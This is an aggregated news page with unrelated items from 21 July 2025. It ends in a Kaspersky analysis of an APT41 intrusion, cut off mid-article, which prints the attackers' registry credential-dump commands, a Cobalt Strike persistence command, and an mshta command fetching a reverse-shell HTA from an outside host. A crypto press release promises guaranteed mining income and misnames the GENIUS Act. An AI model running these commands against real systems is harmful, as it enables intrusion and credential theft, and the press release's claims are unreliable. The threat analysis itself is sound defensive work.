    The MIL Network –

    July 21, 2025
  • Parliament Monsoon Session: Lok Sabha adjourned till 2pm

    Source: Government of India

    Source: Government of India (4)

    The Lok Sabha was adjourned until 2 PM on Monday following uproar by Opposition MPs demanding a discussion on the recent Pahalgam terror attack and the government’s response through Operation Sindoor.

    The House convened at 11 AM but was first adjourned until noon after Opposition members disrupted proceedings, insisting on a statement from Prime Minister Narendra Modi regarding the developments surrounding the attack and Operation Sindoor.

    Expressing his disappointment at the disruptions, Lok Sabha Speaker Om Birla appealed to members to maintain decorum and allow discussions to proceed.

    “This is the Question Hour, and the government is willing to discuss every issue. The House should function, and discussions must take place as per the rules and procedures,” Birla said.

    Despite his appeal, continued sloganeering by Opposition members forced the Speaker to adjourn the House again until 2 PM.

    When the House reconvened, protests resumed after the officiating Speaker informed members that Speaker Om Birla had not granted assent to any of the adjournment motions.

    Defence Minister Rajnath Singh reiterated the government’s willingness to engage in dialogue, “The government is completely ready for discussion on any issue.”

    Responding to the ongoing disruptions, Union Parliamentary Affairs Minister Kiren Rijiju said, “A meeting of the Business Advisory Committee will be held at 2:30 PM to finalise the agenda for discussion. The government is ready, but they (Opposition MPs) are protesting in the Well of the House. This is not the right way to begin the Monsoon Session.”

    Following the adjournment, Leader of the Opposition in the Lok Sabha, Rahul Gandhi, expressed concern over being denied the opportunity to speak, “The question is – why is the Defence Minister allowed to speak in the House while Opposition members, including me as LoP, are not? This is a new approach. Conventionally, if ministers can speak, the Opposition should also be allowed.”

    Congress MP Priyanka Gandhi Vadra echoed the sentiment, stating, “If the government is truly ready for discussion, then they should let the Leader of the Opposition speak. He stood up to speak, and he should be allowed to do so.”

    Meanwhile, BJP MP Baijayant Panda tabled the Report of the Select Committee on the Income Tax Bill, 2025 in the Lok Sabha. The report contains 285 recommendations aimed at overhauling the existing six-decade-old legislation.

    The Monsoon session will run until August 21, with a break scheduled between August 12 and August 18. A total of 21 sittings are planned over the 32-day period.

    (With inputs from ANI)

    July 21, 2025
  • MIL-OSI Europe: Survey on the Access to Finance of Enterprises: firms report lower interest rates amid pressures arising from trade tensions

    Source: European Central Bank

    21 July 2025

    • Firms continued to report declining interest rates on bank loans, while indicating a slight tightening of other lending conditions.
    • The bank loan financing gap remained stable, with firms reporting that both needs for bank loans and the availability of bank loans were broadly unchanged.
    • Firms’ one-year-ahead median inflation expectations decreased to 2.5%, down from 2.9%, while median inflation expectations three and five years ahead remained unchanged at 3.0%.
    • Most firms reported that they had been affected to some extent by trade tensions, with firms exporting to the United States and firms in the manufacturing sector being the most exposed.

    In the most recent round of the Survey on the Access to Finance of Enterprises (SAFE), covering the second quarter of 2025, euro area firms reported a net decrease in interest rates on bank loans (a net -14%, compared with 12% in the previous quarter), suggesting that monetary policy easing is being transmitted to firms. At the same time, a net 16% of firms (down from 24% in the previous quarter) observed increases both in other financing costs (i.e. charges, fees and commissions) and in collateral requirements (a net 11%, down from 13% in the first quarter of 2025) (Chart 1).

    In this survey round, firms indicated a broadly unchanged need for bank loans (a net 1% indicating a decline, down from 4% in the first quarter of 2025, Chart 2) and stable availability of bank loans (a net 1% indicating an increase, compared with a net 1% indicating a decrease in the previous quarter). This left the bank loan financing gap – an index capturing the difference between the need for and the availability of bank loans – broadly unchanged (a net ‑1%, the same as in the previous survey round). Looking ahead, firms expect a slight improvement in the availability of external financing over the next three months.

    Firms continued to perceive the general economic outlook to be the main factor hampering the availability of external financing (a net 17%, compared with a net 21% in the previous survey round). A net 6% of firms indicated an improvement in banks’ willingness to lend (broadly unchanged from the previous survey round).

    A net 8% of firms reported an increase in turnover over the last three months, up from 6% in the previous survey round, with a net 23% of firms being optimistic about developments in the next quarter, although less so than in the previous quarter. Firms continued to see a deterioration in their profits (a net 13%, compared with 16% in the previous survey round), with the decline being more widespread among small and medium-sized enterprises. The survey indicates that a net 50% of firms reported rising cost pressures over the past three months, although to a lesser extent than in the previous quarter.

    On average, firms’ expected selling price growth declined to 2.5%, from 2.9% in previous survey round, while the corresponding figure for wages was 2.8% (down from 3.0% in the previous round) (Chart 3). At the same time, firms signalled a lower increase in non-labour input costs (3.4%, down from 4.0% in the previous round).

    Firms’ inflation expectations for the short term decreased, while remaining unchanged at longer horizons (Chart 4). Median expectations for annual inflation one year ahead declined to 2.5%, from 2.9%, while those for three and five years ahead saw no change, remaining at 3.0%. For inflation five years ahead, the majority of firms continue to indicate, although less so than in the previous round, that risks to the inflation outlook are tilted to the upside (52%, down from 55%), with more firms perceiving balanced risks (33%, up from 30%), leaving the share of firms seeing downside risks unchanged at 14%.

    In this survey round, ad hoc questions were introduced to examine the impacts of recent trade tensions – specifically the announcements of tariffs imposed by the United States – on the business strategies of euro area firms. The intensity of the impact of trade tensions varies significantly across firms, with firms exporting to the US and those in the manufacturing sector being particularly exposed. Approximately 30% of firms express concerns regarding delays or shortages in supply chains. In addition, firms indicated the need to seek alternative suppliers. Survey replies also revealed that the main strategies employed to adapt to the changing trade environment include refocusing sales within domestic and EU markets and restructuring supply chains (Chart 5).

    The report published today presents the main results of the 35th round of the SAFE survey for the euro area. The survey was conducted between 30 May and 27 June 2025. In this survey round, firms were asked about economic and financing developments over the period between April and June 2025. Additionally, firms also reported their expectations for euro area inflation, selling prices and other costs, and they replied to ad hoc questions on trade tensions and investments in artificial intelligence technologies. Altogether, the sample comprised 5,367 firms in the euro area, of which 4,924 (92%) had fewer than 250 employees.

    For media queries, please contact William Lelieveldt, tel.: +49 170 227 9090.

    Notes

    Chart 1

    Changes in the terms and conditions of bank financing for euro area firms

    (net percentages of respondents)

    Base: Firms that had applied for bank loans (including subsidised bank loans), credit lines, or bank or credit card overdrafts. The figures refer to pilot 2 and rounds 30 to 35 of the survey (October 2023-December 2023 to April-June 2025).

    Notes: Net percentages are the difference between the percentage of firms reporting an increase for a given factor and the percentage reporting a decrease. The data included in the chart refer to Question 10 of the survey.

    Chart 2

    Changes in euro area firms’ financing needs and the availability of bank loans

    (net percentages of respondents)

    Base: Firms for which the instrument in question is relevant (i.e. they have used it or have considered using it). Respondents replying “not applicable” or “don’t know” are excluded. The figures refer to pilot 2 and rounds 30 to 35 of the survey (October 2023-December 2023 to April-June 2025).

    Notes: The financing gap indicator combines both financing needs and the availability of bank loans at firm level. The indicator of the perceived change in the financing gap takes a value of 1 (-1) if the need increases (decreases) and availability decreases (increases). If firms perceive only a one-sided increase (decrease) in the financing gap, the variable is assigned a value of 0.5 (-0.5). A positive value for the indicator points to a widening of the financing gap. Values are multiplied by 100 to obtain weighted net balances in percentages. The data included in the chart refer to Questions 5 and Questions 9 of the survey.

    Chart 3

    Expectations for selling prices, wages, input costs and employees one year ahead, by size class

    (percentage changes over the next 12 months)

    Base: All firms. The figures refer to rounds 29 to 35 (September 2023 to June 2025) of the survey, with firms’ replies collected in the last month of the respective survey waves.

    Notes: Average euro area firms’ expectations of changes in selling prices, wages of current employees, non-labour input costs and number of employees for the next 12 months using survey weights. The statistics are computed after trimming the data at the country-specific 1st and 99th percentiles. The data included in the chart refer to Question 34 of the survey.

    Chart 4

    Firms’ median expectations for euro area inflation by size class

    (annual percentages)

    Base: All firms. The figures refer to pilot 2 and rounds 30 to 35 (December 2023 to June 2025) of the survey, with firms’ replies collected in the last month of the respective survey waves.

    Notes: Median firms’ expectations for euro area inflation in one year, three years and five years, calculated using survey weights. The statistics are computed after trimming the data at the country-specific 1st and 99th percentiles. The data included in the chart refer to Question 31 of the survey.

    Chart 5

    Relevance of trade tensions and implications for firms’ strategy over the next twelve months

    (left panel: left-hand scale: percentages of respondents; right-hand scale: averages; right panel: percentages of respondents)

    Base: All firms. The figures refer to round 35 of the survey (April-June 2025).

    Notes: The left panel shows the distribution and the survey weighted averages of the relevance of trade tensions to firms, measured from 1 to 10 (highest) across types of firms. The right panel shows the share of firms reporting the different implications of trade tensions for firms’ strategy over the next twelve months.

    MIL OSI Europe News –

    July 21, 2025
  • MIL-OSI: Topnotch Crypto Redefines XRP Accessibility with Zero-Threshold Mining Platform Backed by GENIUS Act Innovation

    Source: GlobeNewswire (MIL-OSI)

    Houston, Texas, July 21, 2025 (GLOBE NEWSWIRE) — In alignment with the newly enacted GENIUS Act, Topnotch Crypto has introduced an innovative XRP zero-threshold mining platform—a seamless digital environment where XRP holders can participate in decentralized activity without facing traditional entry barriers. This marks a significant step toward what the company calls “frictionless wealth accumulation” in a new era of inclusive blockchain technology.

    GENIUS Act Paves the Way for Inclusion

    The GENIUS Act (Global Economic Network for Inclusive, Unrestricted Scaling) was designed to break down financial and technical boundaries in blockchain access. Its passage signaled a shift in global policy—encouraging crypto platforms to rethink how digital resources are offered to everyday users.

    Topnotch Crypto’s new XRP initiative is a prime example of this empowerment in action. Built on the core values of simplicity, openness, and technological independence, the platform invites users to explore digital participation without complexity or cost.

    Frictionless Access to Decentralized Tools

    The XRP zero-threshold mining platform removes traditional limitations such as hardware requirements, steep learning curves, or upfront deposits. Users need only to register—a quick and guided process—to activate their access to the live mining interface.

    Everything runs securely in the cloud, and users are provided with full visibility into their activity through a streamlined dashboard. The result is a truly hands-off yet transparent system, accessible from any internet-connected device.

    A Simple Start with Lasting Possibilities

    1. Register, try mining, and earn money, all in one go

    The platform provides new users with a $15 computing power reward and promises that even with zero investment, users can receive at least $0.6 in cashable income every day, subverting the traditional paid participation model.

    2. Choose a contract that suits your needs

    Provide more than 10 contracts with different terms and income models to meet the needs of novice and experienced investors. XRP holders can flexibly configure and adjust at any time according to their own asset planning.

    3. Enjoy the income

    Automatically activate contracts + AI mining + 24-hour income settlement, one-stop completion

    This computing power reward is not only an incentive, but also reflects Topnotch Crypto’s commitment to helping users understand the system from the inside out, regardless of whether they have relevant knowledge or exposure to blockchain tools.

    Why XRP? Practicality Meets Performance

    Topnotch Crypto’s focus on XRP for this initiative wasn’t random. Known for its fast settlement speed and efficient design, XRP offers a practical framework for daily blockchain interactions.

    Its ability to handle high volumes of transactions with minimal fees makes it especially suited for real-time applications, including mining in a low-barrier environment. As regulations and industry adoption continue to evolve, XRP stands out as a robust asset for forward-looking platforms.

    Security, Clarity, and Total Transparency

    Topnotch Crypto places a premium on security and user trust. The entire mining operation is backed by:

    • Encrypted protocols to secure user data
    • Cloud redundancy systems for uninterrupted operations
    • Smart contracts for reward calculation and execution
    • On-chain audit trails for full visibility

    These systems work behind the scenes to ensure the user experience remains smooth, transparent, and protected at all times.

    Minimal Requirements, Maximum Accessibility

    The platform is carefully designed to cater to users who may not have previous experience with blockchain or mining. There’s no need for downloads, installations, or third-party software. From registration to mining activation, every step is executed within a clean, web-based interface.

    By removing friction at every touchpoint, Topnotch Crypto ensures that XRP holders—from all walks of life—can participate in blockchain innovation on their own terms.

    What Sets This Platform Apart

    Several unique features define the experience:

    • No threshold to begin—no deposit, no delay
    • Real-time tracking and live mining analytics
    • Device-independent cloud functionality
    • Flexible platform design for future expansion

    These core elements align with the spirit of the GENIUS Act by promoting digital freedom, equal access, and progressive interaction with blockchain tools.

    A Step Toward Broader Blockchain Evolution

    Topnotch Crypto’s XRP mining launch isn’t just a platform release—it represents a paradigm shift. It redefines how decentralized systems can operate: not as gated ecosystems for the technically elite, but as open networks for global interaction.

    By embracing the GENIUS Act, the company leads the way in translating policy into meaningful, user-first solutions. As digital finance grows, initiatives like this will likely serve as models for how access and utility can coexist without compromise.

    Get Started Today

    Topnotch Crypto’s XRP mining platform is now live and accepting global registrations. With no thresholds or upfront deposits, and an intuitive system built to support all levels of users, the future of frictionless digital engagement is just a few clicks away.

    To begin, visit Topnotch Crypto official website and explore the next generation of accessible blockchain infrastructure.

    About Topnotch Crypto
    Topnotch Crypto is a blockchain technology company focused on building inclusive digital tools for modern users. Through cloud-based platforms and accessible solutions, the firm continues to lead efforts that bring practical crypto applications to a broader global audience.

    Media Contact
    PR Department – Topnotch Crypto
    Email: info@topnotchcrypto.com
    Website: https://topnotchcrypto.com/

    Disclaimer: The information provided in this press release does not constitute an investment solicitation, nor does it constitute investment advice, financial advice, or a trading recommendation. Cryptocurrency mining and staking involve risks and may result in the loss of funds. It is strongly recommended that you perform due diligence before investing or trading in cryptocurrencies and securities, including consulting a professional financial advisor.

    Attachment

    • Topnotch Crypto

    The MIL Network –

    July 21, 2025
  • MIL-OSI: Prosafe SE: Recapitalization complete, new share capital registered and forward looking statements

    Source: GlobeNewswire (MIL-OSI)

    Reference is made to the stock exchange announcement published by Prosafe SE (“Prosafe” or the “Company“) on 24 April 2025 where it was announced that Prosafe had agreed the terms of a recapitalization (the “Recapitalization“) which, inter alia, includes a recapitalization of USD 193 million into 321,635,718 new shares in the Company (the “New Shares“) and an offering of up to 17,868,651 warrants to shareholders in the Company as of 16 May 2025 as registered in the Euronex Securities Oslo VPS on the record date 20 May 2025 (the “Warrants“), subject to final approval being obtained by all lenders.

    Reference is further made to the announcement published by the Company on 18 July 2025 regarding approval and publication of a prospectus in relation to issuance of the New Shares and offering of Warrants.

    Registration of the New Shares issued following conversion of USD 193,000,000 of debt into equity has as part of the completion of the Recapitalization been registered with the Norwegian Register of Business Enterprises.

    The Company’s registered share capital has consequently increased by EUR 3,216,357.18, from EUR 178,686.51 to EUR 3,395,043.69, by issuance of 321,635,718 new shares, each with a nominal value of EUR 0.01.

    The Company’s new registered share capital is EUR 3,395,043.69 divided into 339,504,369 shares, each with a nominal value of EUR 0.01.

    Prosafe is pleased to announce that the Recapitalization is now effective. The Recapitalization significantly improves Prosafe’s financial position, providing fresh liquidity and a reduction in debt of USD 193 million.

    Prosafe maintains a positive outlook with new contracts recently secured and improved activity on the back of vessel re-activations. Prosafe recently announced the award of a new 4-year contract for the Safe Notos at a significantly improved day rate of approximately USD 140k/day. The Safe Caledonia started its contract with Ithaca in the UK North Sea on 2 June 2025 and Safe Boreas has arrived in Singapore ahead of the upcoming contract in Australia which has a start-up window between 15 November 2025 and 15 February 2026.

    The Company would like to extend a warm welcome to the new Board of Directors elected at the Company’s annual general meeting held on 21 May 2025. The Company would also like to thank the departing board for all of their work, dedication and support over the past several years.

    The Company expects unrestricted liquidity (excluding restricted cash and cash held in New Group) of approximately USD 90 to 100 million and headroom against the new USD 20 million covenant of approximately USD 70 to 80 million at the date of the Recapitalization.

    Forward Looking Statement:

    Prosafe takes the opportunity to provide guidance for the full year 2025 EBITDA which is anticipated to be in the range of USD 35 – 40 million.  This assumes successful completion of the Safe Boreas re-activation prior to end Q3 2025, planned Special Periodic Surveys (SPS) and related off-hire periods for Safe Zephyrus and Safe Notos during Q3 and Q4 2025 as well as the successful completion of the Safe Caledonia contract. Reference is made to the Q1 presentation published on 21 May 2025 regarding current contracts, anticipated capital expenditure and costs.

    For further information, please contact: 

    Terje Askvig, CEO

    Phone: +47 952 03 886

    Reese McNeel, CFO

    Phone: +47 415 08 186

    This information is subject to the disclosure requirements pursuant to section 5-12 of the Norwegian Securities Trading Act and the requirements of Oslo Børs’ Continuing Obligations.

    The MIL Network –

    July 21, 2025
  • MIL-Evening Report: Labor to put disclaimer under Mark Latham’s caucus room picture

    Source: The Conversation (Au and NZ) – By Michelle Grattan, Professorial Fellow, University of Canberra

    The picture of Mark Latham on the caucus room gallery of Labor leaders will have an annotation under it saying he was expelled for life and his actions do not accord with Labor values.

    The first meeting of the new caucus agreed unanimously to this compromise, after pressure from some in Labor to remove the photo of Latham, who led the party in 2003–05.

    Latham’s former partner recently accused him of a “sustained pattern” of domestic abuse, in a civil court application for an apprehended violence order. It will be heard next week.

    In other condemned behaviour – the latest of a string of controversial incidents over the years – Latham, now an independent in the NSW upper house, also photographed women members without their consent.

    The wording under the picture will read:

    In 2017, Mark Latham was expelled from the Australian Labor Party and banned for life. His actions do not accord with Labor values and fail to meet the standards we expect and demand.

    Opinion in the party about what to do about the picture has been divided. The matter was discussed by both the right and left factions at their meetings.

    The Minister for Women, Katy Gallagher, told the ABC, “I think there’s a recognition, on balance, that you can’t erase history”. But acknowledging that Latham was expelled and his actions “don’t align with modern Australian Labor Party values or standards” was important, she said.

    “I wasn’t there at the time but I think it was a style of leadership that didn’t sit well with the values of the Australian Labor Party and it’s a type of leadership people wouldn’t want to return to.”

    Ahead of the new parliament’s opening on Tuesday, both Prime Minister Anthony Albanese and Opposition Leader Sussan Ley addressed their respective party rooms.

    Albanese told his huge caucus, which includes 94 members of the House of Representatives, that if Labor maintained its sense of discipline and purpose there was no reason why they could not all be returned at the next election – and their numbers added to as well.

    He said Labor was embarking on “our year of delivery. That is our focus. We’ve just been through an election, we had clear commitments and we want to deliver them.”

    Ley told the Coalition party room Albanese was giving interviews “suggesting that we should just get out of the way. Well we won’t be getting out of the way.”

    The opposition would cooperate with constructive government policies, as it was doing on child care safety reforms.

    But if the government brought forward legislation that was not in the national interest “we will fight them every step of the way”, she said, flagging the Coalition’s opposition to potential tax increases.

    The first parliamentary week comes against a background of further depressing news for the Coalition, after its election rout.

    The latest Newspoll shows Labor improving its position since the election, to lead 57–43 on a two-party basis. Labor has a primary vote of 36%, while the Coalition is down to 29%, which is the lowest in the history of Newspoll, that goes back to the mid-1980s.

    Michelle Grattan does not work for, consult, own shares in or receive funding from any company or organisation that would benefit from this article, and has disclosed no relevant affiliations beyond their academic appointment.

    – ref. Labor to put disclaimer under Mark Latham’s caucus room picture – https://theconversation.com/labor-to-put-disclaimer-under-mark-lathams-caucus-room-picture-261097

    MIL OSI Analysis – EveningReport.nz –

    July 21, 2025
  • MIL-OSI Africa: South Africa convenes high-level Indaba to tackle FMD outbreaks

    Source: Government of South Africa

    South Africa is currently experiencing significant and ongoing challenges with widespread outbreaks of Foot and Mouth disease (FMD), affecting several provinces, including KwaZulu-Natal, Mpumalanga, Gauteng and, most recently, the Free State.

    The resurgence of the disease has resulted in livestock movement restrictions and significantly impacted the country’s red meat trade on international markets.

    In response to this escalating crisis, the Department of Agriculture, in partnership with the Agricultural Research Council (ARC), the University of Pretoria, and Onderstepoort Biological Products (OBP), is hosting a national Foot and Mouth Disease Indaba.

    The two-day event, starting Monday, 21 July 2025, will take place at the ARC-VIMP Campus in Roodeplaat, northeast of Pretoria.

    Agriculture Minister John Steenhuisen and Deputy Minister Nokuzola Capa will lead the Indaba, which aims to bring together top veterinary scientists, agricultural experts, and key industry stakeholders, to deliberate on and develop long-term solutions to combat FMD.

    “Having already inflicted significant damage to the multibillion-rand livestock sector, the disease continues to threaten South Africa’s broader economy. Therefore, the Indaba presents a vital opportunity to unite expertise and resources to effectively eradicate this devastating disease.

    “The Indaba will convene a range of multidisciplinary specialists to develop a coordinated and comprehensive approach to controlling and ultimately eradicating foot and mouth disease,” the department said in a statement.

    The key areas of discussion will include strengthening biosecurity measures at farm level, enhancing vaccination programmes, and reinforcing animal movement controls.

    The Department of Agriculture, in collaboration with the Agricultural Research Council, emphasised its committed to identifying and implementing sustainable solutions to FMD.

    The department added that the Indaba signifies a crucial advancement in the ongoing efforts to combat the disease.

    “By cultivating strong partnerships between government entities, academic institutions and industry leaders, the Department of Agriculture is committed to developing precise and effective measures that will eradicate the disease and safeguard the long-term sustainability of South Africa’s agricultural sector.” – SAnews.gov.za

    MIL OSI Africa –

    July 21, 2025
  • MIL-OSI Africa: CoGTA Deputy Minister leads Emfuleni Local Municipality accountability visit 

    Source: Government of South Africa

    Monday, July 21, 2025

    The Deputy Minister of Cooperative Governance and Traditional Affairs (CoGTA), Dr Namane Dickson Masemola, is today leading an intergovernmental accountability engagement with the Emfuleni Local Municipality.

    According to the department, Monday’s visit forms part of the national ‘Every Municipality Must Work’ campaign, aimed at strengthening local government performance through coordinated support under the District Development Model (DDM).
    Emfuleni struggles with financial mismanagement, inadequate service delivery, and crumbling infrastructure. 

    “Engagement will focus on addressing persistent service delivery challenges and capacity constraints facing Emfuleni, and on unblocking barriers to effective governance,” the department says. 

    The Deputy Minister will meet with local leadership and stakeholders to assess the municipality’s operational performance. 
    According to the department, the meeting will take place at Emfuleni Municipal Offices, and media will be allowed to cover the opening session and conduct interviews with leadership. – SAnews.gov.za 
     

    Share this post:

    MIL OSI Africa –

    July 21, 2025
  • PM Modi opens Parliament’s Monsoon Session with call for unity, hails Operation Sindoor as symbol of national pride

    Source: Government of India

    Source: Government of India (4)

    Prime Minister Narendra Modi on Monday inaugurated the Monsoon Session of Parliament, calling it a “true celebration of victory” and a moment of collective national pride. Addressing the media outside Parliament, the Prime Minister highlighted recent achievements across defence, science, economy, and digital governance, urging unity among lawmakers to strengthen the nation’s resolve.

    Calling the monsoon a symbol of “renewal and rejuvenation,” PM Modi pointed to favourable weather conditions and record-high water reservoir levels—three times the ten-year average—as indicators of a strong agricultural and rural economic outlook.

    “This Monsoon Session is a moment of great pride for the country,” he said, referring to the recent unfurling of the Indian tricolour aboard the International Space Station. He described the milestone as a unifying moment for both Houses of Parliament and an inspiration for India’s youth in the fields of science, technology, and innovation.

    PM Modi praised the success of Operation Sindoor, India’s precision strike targeting terrorist camps. “Our armed forces achieved their mission with 100 percent success, neutralizing high-value targets within 22 minutes,” he said. He attributed this precision and efficiency to India’s growing defence self-reliance, highlighting global recognition of ‘Made in India’ military technology.

    The Prime Minister called on Parliament to come together in a unified tribute to the operation, stating that such solidarity would boost defence sector innovation, manufacturing, and employment for India’s youth.

    On the internal security front, PM Modi spoke about the decline of terrorism, Naxalism, and Maoism. He noted that many districts once dominated by insurgency have now transformed into “Green Growth Zones,” underscoring the growing influence of constitutional order over violence.

    He also highlighted India’s rise from being among the “Fragile Five” economies in 2014 to being on the cusp of becoming the world’s third-largest economy. He noted that 250 million people have risen out of poverty during the past decade, and emphasized that inflation—currently around 2 percent—has stabilized the cost of living for citizens.

    Turning to digital achievements, the Prime Minister lauded the widespread adoption of the Unified Payments Interface (UPI), which he described as a symbol of India’s leadership in the global fintech landscape. He said UPI has now become a recognized name worldwide.

    Citing data from the International Labour Organization, PM Modi noted that more than 900 million Indians are now covered under social security. He also highlighted India’s successful eradication of trachoma, as declared by the World Health Organization, describing it as a key milestone in the nation’s public health journey.

    Addressing the recent Pahalgam terror attack, PM Modi credited a united response by MPs across party lines for exposing Pakistan’s role in sponsoring terrorism at the global level. “This cross-party effort strengthened our diplomatic campaign and helped the world understand India’s position,” he said.

    As the session got underway, the Prime Minister made a final appeal for unity among MPs. “While political opinions may vary, our intentions in matters of national interest must remain aligned,” he said. Modi urged all Members of Parliament to carry forward the spirit of “one voice” in championing India’s sovereignty, development, and aspirations.

    July 21, 2025
  • MIL-OSI Banking: Rumble in the jungle: APT41’s new target in Africa

    Source: Securelist – Kaspersky

    Headline: Rumble in the jungle: APT41’s new target in Africa

    Introduction

    Some time ago, Kaspersky MDR analysts detected a targeted attack against government IT services in the African region. The attackers used hardcoded names of internal services, IP addresses, and proxy servers embedded within their malware. One of the C2s was a captive SharePoint server within the victim’s infrastructure.

    During our incident analysis, we were able to determine that the threat actor behind the activity was APT41. This is a Chinese-speaking cyberespionage group known for targeting organizations across multiple sectors, including telecom and energy providers, educational institutions, healthcare organizations and IT energy companies in at least 42 countries. It’s worth noting that, prior to the incident, Africa had experienced the least activity from this APT.

    Detection

    Our MDR team identified suspicious activity on several workstations within an organization’s infrastructure. These were typical alerts indicating the use of the WmiExec module from the Impacket toolkit. Specifically, the alerts showed the following signs of the activity:

    • A process chain of svchost.exe ➔exe ➔ cmd.exe
    • The output of executed commands being written to a file on an administrative network share, with the file name consisting of numbers separated by dots:

    WmiExec process tree

    The attackers also leveraged the Atexec module from the Impacket toolkit.

    Scheduler tasks created by Atexec

    The attackers used these commands to check the availability of their C2 server, both directly over the internet and through an internal proxy server within the organization.

    The source of the suspicious activity turned out to be an unmonitored host that had been compromised. Impacket was executed on it in the context of a service account. We would later get that host connected to our telemetry to pinpoint the source of the infection.

    After the Atexec and WmiExec modules finished running, the attackers temporarily suspended their operations.

    Privilege escalation and lateral movement

    After a brief lull, the attackers sprang back into action. This time, they were probing for running processes and occupied ports:

    cmd.exe /c netstat –ano > C:Windowstemptemp_log.log

    cmd.exe /c tasklist /v > C:Windowstemptemp_log.log

    They were likely trying to figure out if the target hosts had any security solutions installed, such as EDR, MDR or XDR agents, host administration tools, and so on.

    Additionally, the attackers used the built-in reg.exe utility to dump the SYSTEM and SAM registry hives.

    cmd.exe /c reg save HKLMSAM C:Windowstemptemp_3.log

    cmd.exe /c reg save HKLMSYSTEM C:Windowstemptemp_4.log

    On workstations connected to our monitoring systems, our security solution blocked the activity, which resulted in an empty dump file. However, some hosts within the organization were not secured. As a result, the attackers successfully harvested credentials from critical registry hives and leveraged them in their subsequent attacks. This underscores a crucial point: to detect incidents promptly and minimize damage, security solution agents must be installed on all workstations across the organization without exception. Furthermore, the more comprehensive your telemetry data, the more effective your response will be. It’s also crucial to keep a close eye on the permissions assigned to service and user accounts, making sure no one ends up with more access rights than they really need. This is especially true for accounts that exist across multiple hosts in your infrastructure.

    In the incident we’re describing here, two domain accounts obtained from a registry dump were leveraged for lateral movement: a domain account with local administrator rights on all workstations, and a backup solution account with domain administrator privileges. The local administrator privileges allowed the attackers to use the SMB protocol to transfer tools for communicating with the C2 to the administrative network share C$. We will discuss these tools – namely Cobalt Strike and a custom agent – in the next section.

    In most cases, the attackers placed their malicious tools in the C:WINDOWSTASKS directory on target hosts, but they used other paths too:

    1

    2

    3

    4

    5

    6

    7

    c:windowstasks

    c:programdata

    c:programdatausoshared

    c:userspublicdownloads

    c:userspublic

    c:windowshelphelp

    c:userspublicvideos

    Files from these directories were then executed remotely using the WMI toolkit:

    Lateral movement via privileged accounts

    C2 communication

    Cobalt Strike

    The attackers used Cobalt Strike for C2 communication on compromised hosts. They distributed the tool as an encrypted file, typically with a TXT or INI extension. To decrypt it, they employed a malicious library injected into a legitimate application via DLL sideloading.

    Here’s a general overview of how Cobalt Strike was launched:

    Attackers placed all the required files – the legitimate application, the malicious DLL, and the payload file – in one of the following directories:

    C:UsersPublic

    C:Users{redacted}Downloads

    C:WindowsTasks

    The malicious library was a legitimate DLL modified to search for an encrypted Cobalt Strike payload in a specifically named file located in the same directory. Consequently, the names of the payload files varied depending on what was hardcoded into the malicious DLL.

    During the attack, the threat actor used the following versions of modified DLLs and their corresponding payloads:

    Legitimate file name DLL Encrypted Cobalt Strike
    TmPfw.exe TmDbg64.dll TmPfw.ini
    cookie_exporter.exe msedge.dll Logs.txt
    FixSfp64.exe log.dll Logs.txt
    360DeskAna64.exe WTSAPI32.dll config.ini
    KcInst.exe KcInst32.dll kcinst.log
    MpCmdRunq.exe mpclient.dll Logs.txt

    Despite using various legitimate applications to launch Cobalt Strike, the payload decryption process was similar across instances. Let’s take a closer look at one example of Cobalt Strike execution, using the legitimate file cookie_exporter.exe, which is part of Microsoft Edge. When launched, this application loads msedge.dll, assuming it’s in the same directory.

    The attackers renamed cookie_exporter.exe to Edge.exe and replaced msedge.dll with their own malicious library of the same name.

    When any dynamic library is loaded, the DllEntryPoint function is executed first. In the modified DLL, this function included a check for a debugging environment. Additionally, upon its initial execution, the library verified the language packs installed on the host.. The malicious code would not run if it detected any of the following language packs:

    • Japanese (Japan)
    • Korean (South Korea)
    • Chinese (Mainland China)
    • Chinese (Taiwan)

    If the system passes the checks, the application that loaded the malicious library executes an exported DLL function containing the malicious code. Because different applications were used to launch the library in different cases, the exported functions vary depending on what the specific software calls. For example, with msedge.dll, the malicious code was implemented in the ShowMessageWithString function, called by cookie_exporter.exe.

    The ShowMessageWithString function retrieves its payload from Logs.txt, a file located in the same directory. These filenames are typically hardcoded in the malicious dynamic link libraries we’ve observed.

    The screenshot below shows a disassembled code segment responsible for loading the encrypted file. It clearly reveals the path where the application expects to find the file.

    The payload is decrypted by repeatedly executing the following instructions using 128-bit SSE registers:

    Once the payload is decrypted, the malicious executable code from msedge.dll launches it by using a standard method: it allocates a virtual memory region within its own process, then copies the code there and executes it by creating a new thread. In other versions of similarly distributed Cobalt Strike agents that we examined, the malicious code could also be launched by creating a new process or upon being injected into the memory of another running process.

    Beyond the functionality described above, we also found a code segment within the malicious libraries that appeared to be a message to the analyst. These strings are supposed to be displayed if the DLL finds itself running in a debugger, but in practice this doesn’t occur.

    Once Cobalt Strike successfully launches, the implant connects to its C2 server. Threat actors then establish persistence on the compromised host by creating a service with a command similar to this:

    1

    C:Windowssystem32cmd.exe /C sc create “server power” binpath= “cmd /c start C:WindowstasksEdge.exe” && sc description “server power” “description” && sc config “server power” start= auto && net start “server power”

    Attackers often use the following service names for embedding Cobalt Strike:

    server power

    WindowsUpdats

    7–zip Update

    Agent

    During our investigation, we uncovered a compromised SharePoint server that the attackers were using as the C2. They distributed files named agents.exe and agentx.exe via the SMB protocol to communicate with the server. Each of these files is actually a C# Trojan whose primary function is to execute commands it receives from a web shell named CommandHandler.aspx, which is installed on the SharePoint server. The attackers uploaded multiple versions of these agents to victim hosts. All versions had similar functionality and used a hardcoded URL to retrieve commands:

    The agents executed commands from CommandHandler.aspx using the cmd.exe command shell launched with the /c flag.

    While analyzing the agents, we didn’t find significant diversity in their core functionality, despite the attackers constantly modifying the files. Most changes were minor, primarily aimed at evading detection. Outdated file versions were removed from the compromised hosts.

    The attackers used the deployed agents to conduct reconnaissance and collect sensitive data, such as browser history, text files, configuration files, and documents with .doc, .docx and .xlsx extensions. They exfiltrated the data back to the SharePoint server via the upload.ashx web shell.

    It is worth noting that the attackers made some interesting mistakes while implementing the mechanism for communicating with the SharePoint server. Specifically, if the CommandHandler.aspx web shell on the server was unavailable, the agent would attempt to execute the web page’s error message as a command:

    Obtaining a command shell: reverse shell via an HTA file

    If, after their initial reconnaissance, the attackers deemed an infected host valuable for further operations, they’d try to establish an alternative command-shell access. To do this, they executed the following command to download from an external resource a malicious HTA file containing an embedded JavaScript script and run this file:

    1

    “cmd.exe” /c mshta hxxp[:]//github.githubassets[.]net/okaqbfk867hmx2tvqxhc8zyq9fy694gf/hta

